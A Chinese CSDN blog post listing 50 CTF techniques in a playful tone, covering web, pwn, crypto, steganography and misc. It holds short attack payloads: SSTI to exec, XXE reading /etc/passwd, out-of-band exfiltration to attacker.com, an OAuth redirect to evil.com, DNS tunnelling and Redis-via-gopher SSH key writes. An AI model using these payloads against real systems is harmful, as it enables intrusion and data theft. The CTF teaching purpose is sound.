CTF选手必收藏的50个实战解题思路，从零基础到精通，收藏这篇就够了！

黑客大白

于 2025-04-15 10:35:28 发布

阅读量888

点赞数 21

文章标签：网络安全安全系统安全 web安全

本文链接：https://blog.csdn.net/Libra1313/article/details/147242933

版权

CTF 竞赛的真谛：速度、套路，还有那么点“歪门邪道”

核心目标：别跟我说情怀，拿到 Flag 才是王道！快速搞定，工具用起来，套路玩起来。
关键原则：先撒网，后捞鱼！信息收集是爹，拆解任务是妈，搞不定就别想回家！

第一部分：Web 安全？不存在的，叫“花式作死大赛”更贴切（15 个姿势）

SQL 注入？WAF 算个鸟！
- /*!50000注释*/？老掉牙了！但架不住好使啊！MySQL 的“祖传秘方”，WAF看了直摇头。
- CONCAT(CHAR(115),CHAR(101))？字符串拼接大法好！就是有点费脑子，不如直接上Burp Suite爆破来得快。
SSTI 模板注入？这可是 RCE 的“后花园”
- {{''.__class__.__mro__[1].__subclasses__()}}？Flask/Jinja2 的棺材板压不住了！危险类，安排！
- Twig 模板的{{_self.env.registerUndefinedFilterCallback("exec")}}？一句话木马，了解一下！
文件包含？“隔墙有耳”的艺术
- php://input？POST 数据随便写，Webshell 直接安排上！前提是目标站点得配合。
- logrotate日志文件？/proc/self/environ？路径泄露一时爽，一直泄露一直爽！前提是你能找到。
JWT 伪造？“无中生有”的身份认证
- alg改成none？删掉签名？简单粗暴，但往往有效！前提是服务器没做校验。
- hashcat -m 16500？暴力破解弱密钥？这年头还有人用弱密钥？但凡事都有万一嘛！
XXE 漏洞？读取文件只是开胃菜
- <!ENTITY xxe SYSTEM "file:///etc/passwd">？读取系统文件？信息泄露警告！
- http://attacker.com/?data=%xxe;？OOB 外带数据？把服务器当跳板，真有你的！
CSRF？“隔山打牛”的请求伪造
- <img src="[URL]">？自动提交表单？防不胜防！前提是用户得点开你的链接。
SSRF？内网漫游指南
- gopher://协议攻击 Redis？未授权访问？写入 SSH 密钥？一条龙服务，直接拿下服务器！
反序列化？“潘多拉魔盒”的开启
- __destruct()/__wakeup()？PHP 的魔术方法？一不小心就 RCE 了！
- Java Commons-Collections？InvokerTransformer？反射机制 YYDS！
Cookie 伪造？“狸猫换太子”的身份冒充
- flask-unsign？Flask Session 签名伪造？拿到密钥就为所欲为！
CORS 配置错误？“门户大开”的跨域访问
- Origin: target.com？修改请求头？欺骗服务器？胆大心细，方能成功！
HTTP 请求走私？“瞒天过海”的请求篡改
- Transfer-Encoding: chunked？Content-Length？冲突绕过？网关表示很受伤！
目录穿越？“翻墙越狱”的文件访问
- ....//？%2e%2e%2f？路径过滤？不存在的！
Web 缓存投毒？“指鹿为马”的内容篡改
- X-Forwarded-Host？篡改 Host 头？注入恶意内容？缓存服务器：我太难了！
OAuth 登录劫持？“李代桃僵”的授权窃取
- redirect_uri=http://evil.com？伪造回调 URL？授权码到手，天下我有！
浏览器特性滥用？“暗度陈仓”的秘密窃取
- <link rel="prefetch" href="secret.php">？窃取登录态？浏览器：这锅我不背！

第二部分：逆向？PWN？这才是真正的技术活！（12 个套路）

函数定位？大海捞针？不存在的！
- "flag"？"correct"？字符串搜索大法好！IDA 用起来！
栈溢出？经典永不过时！
- cyclic 200？dmesg？计算偏移量？手速要快，姿势要帅！
格式化字符串？“指哪打哪”的内存修改
- %n？任意地址写入？修改 GOT 表？控制程序流程，so easy！
堆利用？UAF？Double Free？“亡羊补牢”的游戏
- 释放后重用？修改虚表指针？劫持控制流？堆风水，轮流转！
ROP 链？“借刀杀人”的艺术
- ROPgadget --binary ./pwn？提取指令片段？把程序变成你的提线木偶！
反调试？“猫鼠游戏”的终极对抗
- 修改/proc/self/status？欺骗检查？让调试器无路可走！
动态 Hook？“釜底抽薪”的密码破解
- LD_PRELOAD？劫持strcmp()？绕过密码校验？直接进后台，不讲武德！
Shellcode？“一击致命”的恶意代码
- msfvenom -b ''？生成无空字符的 Shellcode？保证稳定运行，不翻车！
整数溢出？“以小博大”的漏洞利用
- size = -1？绕过长度检查？小漏洞，大危害！
Angr？“自动驾驶”的漏洞挖掘
- 自动化求解路径约束？破解“迷宫”题？符号执行，YYDS！
Patch 二进制？“乾坤大挪移”的程序修改
- Binary Ninja？jz → jnz？修改跳转条件？让程序听你的话！
侧信道攻击？“窃听风云”的密码破解
- 通过时间差判断密码正确性？逐字符爆破？耐心是成功的关键！

第三部分：密码学？隐写术？眼力、脑力，缺一不可！（13 个技巧）

Base 家族？“千变万化”的编码游戏
- Base64？Base32？Base58？特征要记牢，一眼就能认出来！
RSA 低指数？“一力降十会”的数学碾压
- e=3？明文较短？直接开立方？简单粗暴，但前提是条件满足！
RSA 共模？“螳螂捕蝉，黄雀在后”的数学陷阱
- 相同明文加密？扩展欧几里得算法？数学不好，寸步难行！
哈希长度扩展？“偷梁换柱”的签名伪造
- SHA1？MD5？填充机制？hash_extender？伪造签名，瞒天过海！
培根密码？“字里行间”的秘密
- 5 位二进制模式？A=AAAAA？B=AAAAB？仔细观察，密码就在眼前！
词频分析？“抽丝剥茧”的字母破解
- 英文单表替换密码？统计高频字母？E？T？A？概率论yyds！
LSB 隐写？“细致入微”的像素分析
- Stegsolve.jar？RGB 最低位？放大再放大，细节决定成败！
音频隐写？“声波中的秘密”
- Audacity？频谱图？摩尔斯电码？二进制波形？耳朵也要灵敏！
ZIP 伪加密？“障眼法”的破解
- 修改 ZIP 文件头？zipdetails？分析结构？假的就是假的，骗不了人！
PDF 隐写？“文档里的乾坤”
- pdftotext？提取隐藏文本？检查对象流？/FlateDecode？PDF 也是一个宝藏！
NTFS 数据流？“暗藏玄机”的文件系统
- dir /R？ADS？Alternate Data Stream？Windows 也有小秘密！
PNG 文件修复？“妙手回春”的文件恢复
- 手动修复文件头？CRC 校验？文件头坏了？自己修！
二维码？“扫一扫，啥都有”
- zbarimg？扫描模糊二维码？科技改变生活！

第四部分：MISC？编程？“杂货铺”里的百宝箱！（10 个技巧）

编码转换？“万能转换器”
- Python 脚本？Hex？Base85？URL 编码？批量处理，效率翻倍！
流量分析？“蛛丝马迹”
- Wireshark？http.request.method == "POST"？过滤 HTTP 流？POST 请求藏猫腻！
内存取证？“亡者归来”
- Volatility？volatility -f dump.raw pslist？提取进程列表？还原真相！
社工？“知己知彼，百战不殆”
- WHOIS 查询？域名注册人邮箱？信息收集，无处不在！
正则？“一网打尽”
- grep -oE 'flag{[a-zA-Z0-9_]+}'？快速匹配 Flag 格式？正则表达式，真香！
时间盲注？“水滴石穿”
- Python 脚本？requests？延时判断？逐字符爆破？耐心是成功的秘诀！
Git 泄露？“版本控制的漏洞”
- /.git/HEAD？git-dumper？恢复源码？版本控制，也要注意安全！
DNS 隧道？“暗度陈仓”
- 长域名请求？abcd1234.evil.com？Base64 数据？DNS 隧道，防不胜防！
Excel 宏？“办公室的陷阱”
- 解压 XLSM？vbaProject.bin？恶意宏？Excel 宏，也要小心！
PDF 混淆？“解铃还须系铃人”
- qpdf --stream-data=uncompress？解压对象流？PDF 混淆，也能破解！